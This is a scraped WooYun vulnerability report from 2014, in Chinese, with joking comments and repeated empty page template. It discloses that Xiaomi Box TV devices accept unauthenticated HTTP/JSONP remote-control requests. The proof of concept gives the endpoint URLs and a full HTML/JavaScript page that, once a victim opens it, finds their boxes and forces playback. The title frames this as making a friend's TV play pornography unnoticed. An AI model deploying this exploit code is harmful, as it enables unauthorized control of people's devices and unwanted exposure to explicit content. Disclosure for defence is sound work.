控制用户小米盒子播放内容(让你不知不觉中播放av)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-050904

漏洞标题：控制用户小米盒子播放内容(让你不知不觉中播放av)

漏洞作者： marvin

提交时间：2014-02-14 10:21

修复时间：2014-05-12 10:22

公开时间：2014-05-12 10:22

漏洞类型：设计不当

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-02-14：细节已通知厂商并且等待厂商处理中
2014-02-24：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2014-04-20：细节向核心白帽子及相关领域专家公开
2014-04-30：细节向普通白帽子公开
2014-05-10：细节向实习白帽子公开
2014-05-12：细节向公众公开

简要描述：

小米盒子设计缺陷，导致可被攻击控制

详细说明：

小米盒子可使用http方式进行远程遥控，接口设计缺陷导致可轻易被攻击。
比如给朋友发个网址，如果他用家里任意电脑或手机啥的打开了，可让他家电视上自动开始播放毛片，神不知鬼不觉。

漏洞证明：

利用步骤，以播放视频为例：
1、通过http://pds.duokanbox.com/peer/fetchbyipopen/?mac_address=1&callback=wooyun 接口可获得当前用户的小米盒子列表，和http远程控制ip及端口
2、访问http://ip:port/request?action=isAlive&callback=wooyun 获取盒子状态
3、访问http://ip:port/video/action=play&clientname=PC&url=视频地址&name=test&callback=wooyun，提交播放请求
同时可发现http://ip:port/controller 接口也可访问，能更多控制。
演示：http://yekai.me/mitv/。

<!doctype html>
<html>
<head>
	<meta charset="utf-8">
	<title>你有小米盒子么？</title>
</head>
<body>
	<p id="tips" style="display:none">友情提示：播放过程中请不要刷新该页面，会有bug导致电视可能坏掉！</p>
	<ul id="playing">
	</ul>
	<script type="text/javascript">
	(function(){
		var testVideo = 'http://pl.youku.com/playlist/m3u8?ts=1392311744&keyframe=0&vid=XNjYxNjI1ODQ4&type=hd2';
		var randomStr = function(length){
			var ret = [];
			length = length || 10;
			while(length--){
				ret.push(String.fromCharCode(97 + Math.floor(Math.random()*25)));
			}
			return ret.join('');
		};
		var jsonp = function(url, cb){
			var s = document.createElement('script');
			if(url.search('%cb%') !== -1 && cb){
				var fcName = randomStr();
				window[fcName] = cb;
				url = url.replace('%cb%', fcName);
			}
			s.src = url;
			document.head.appendChild(s);
		};
		var $playlist = document.getElementById('playing'),
			tips = false;
		var playingTmpl = function(data){
			if(!tips){
				document.getElementById('tips').style.display = 'block';
				tips = true;
			}
			var html = '<li>' + data.devicename + ' : <button data-tv="' + data.ip + '">stop</button></li>';
			$playlist.innerHTML += html;
		};		
		var MI = {
			getTvs : function(cb){
				jsonp('http://pds.duokanbox.com/peer/fetchbyipopen/?mac_address=1&callback=%cb%', function(data){
					if(data && data.status === 0){
						cb && cb(data.data);
					}
				});
			},
			isActive : function(tv, cb){
				jsonp('http://' + tv + '/request?action=isAlive&callback=%cb%', function(data){
					if(data && data.status === 0){
						cb && cb(data.data);
					}
				});
			},
			play : function(tv, video, name, cb){			
				jsonp('http://' + tv + '/video/action=play&clientname=PC&url=' + encodeURIComponent(video) + '&name=' + encodeURIComponent(name) + '&callback=%cb%', 
					function(data){
						cb && cb(!data.status);
				});				
			},
			stop : function(tv, cb){
				jsonp('http://' + tv + '/controller?action=keyEvent&keyCode=back&callback=%cb%', function(data){
						cb && cb(!data.status);
				});				
			}
		};
		MI.getTvs(function(tvs){
			tvs.forEach(function(tv){
				MI.isActive(tv, function(tvData){
					if(tvData){
						MI.play(tvData.ip, testVideo, '随便一个名字', function(success){
							success && playingTmpl(tvData);
						});
					}
				});
			});
		});
		document.addEventListener('click', function(e){
			var target = e.target;
			if(target.tagName.toLowerCase() === 'button'){
				var tv = target.dataset.tv;
				MI.stop(tv, function(status){
					if(status){
						target.parentNode.parentNode.removeChild(target.parentNode);
					}
				});
			}
		});
	})();
	</script>
</body>
</html>

修复方案：

不使用jsonp可跨站获取数据接口可避免部分问题

版权声明：转载请注明来源 marvin@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-05-12 10:22

厂商回复：

漏洞Rank：20 (WooYun评价)

漏洞评价：

2014-02-14 10:38 | zzR ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1：5 无限量收 [平台担保])

让你不知不觉中播放avi
2014-02-14 11:11 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

让你不知不觉中播放avi
2014-02-14 11:13 | 计算姬 ( 普通白帽子 | Rank:398 漏洞数:90 | 看我看我看我啊)

让你不知不觉中播放avi
2014-02-14 11:14 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

让你不知不觉中播放avi
2014-02-14 11:37 | 超威蓝猫 ( 核心白帽子 | Rank:1092 漏洞数:117 | STEAM_0:0:55968383)

DLNA？..
2014-02-14 12:06 | 大大灰狼 ( 普通白帽子 | Rank:248 漏洞数:53 | Newbie)

真的吗？？？？？
2014-02-14 12:26 | Damo ( 普通白帽子 | Rank:209 漏洞数:31 | 我只是喜欢看加菲猫而已ส็็็็็็็็...)

让你不知不觉中播放avi
2014-02-14 13:22 | Jeremy ( 普通白帽子 | Rank:106 漏洞数:11 | )

让你不知不觉中播放avi
2014-02-14 13:43 | 有妹子送上 ( 实习白帽子 | Rank:89 漏洞数:28 | 杭州最帅的男人)

让你不知不觉中播放avi
2014-02-14 13:54 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

让你不知不觉中播放avi
2014-02-14 14:14 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大（腾讯微博Passer...)

airplay?
2014-02-14 14:14 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大（腾讯微博Passer...)

像天猫魔盒一个网段里面就可以控制，也不用授权啊
2014-02-14 14:45 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

好神奇……
2014-02-14 16:04 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远，还需要厂商和白帽...)

让你不知不觉中播放avi
2014-02-14 16:47 | Finger ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗，任何自称Finger并...)

让你不知不觉中播放avi
2014-02-14 17:22 | gm100861 ( 路人 | Rank:1 漏洞数:2 | http://www.gm100861.com/)

让你不知不觉中播放avi
2014-02-14 17:34 | 小杨 ( 路人 | Rank:22 漏洞数:4 | 。)

专业插楼30年
2014-02-14 17:40 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

这就是黑哥微博中说的那个么？
2014-02-14 17:42 | Saknc ( 路人 | Rank:20 漏洞数:3 | 小菜B一个)

让你不知不觉中播放avi
2014-02-14 17:58 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

让你不知不觉中播放avi
2014-02-14 19:24 | 魂淡、 ( 路人 | Rank:17 漏洞数:2 | 么么哒)

让你不知不觉中播放avi
2014-02-14 21:17 | Richard ( 路人 | Rank:6 漏洞数:2 )

让你不知不觉中播放avi
2014-02-14 21:19 | 正好五个字 ( 实习白帽子 | Rank:93 漏洞数:15 )

让你不知不觉中播放avi
2014-02-18 00:57 | winT ( 路人 | Rank:3 漏洞数:1 | 关注信息安全)

让你不知不觉中播放avi
2014-02-18 20:03 | 有妹子送上 ( 实习白帽子 | Rank:89 漏洞数:28 | 杭州最帅的男人)

让你不知不觉中播放avi
2014-02-18 22:33 | 天际 ( 路人 | Rank:3 漏洞数:1 | 我只是在打酱油)

求让我不知不觉中播放avi
2014-02-20 02:08 | CJ也疯狂 ( 路人 | Rank:7 漏洞数:3 | 专业源于专注！踏踏实实走好每一步)

呼呼~
2014-02-24 23:44 | abaddon ( 实习白帽子 | Rank:37 漏洞数:10 | 我叫什么名字)

是AV 不是AVI 貌似这个可被敌对势力应用

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-050904

漏洞标题：控制用户小米盒子播放内容(让你不知不觉中播放av)

相关厂商：小米科技

漏洞作者： marvin

提交时间：2014-02-14 10:21

修复时间：2014-05-12 10:22

公开时间：2014-05-12 10:22

漏洞类型：设计不当

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 marvin@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-050904

漏洞标题：控制用户小米盒子播放内容(让你不知不觉中播放av)

相关厂商：小米科技

漏洞作者： marvin

提交时间：2014-02-14 10:21

修复时间：2014-05-12 10:22

公开时间：2014-05-12 10:22

漏洞类型：设计不当

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-050904"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 marvin@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：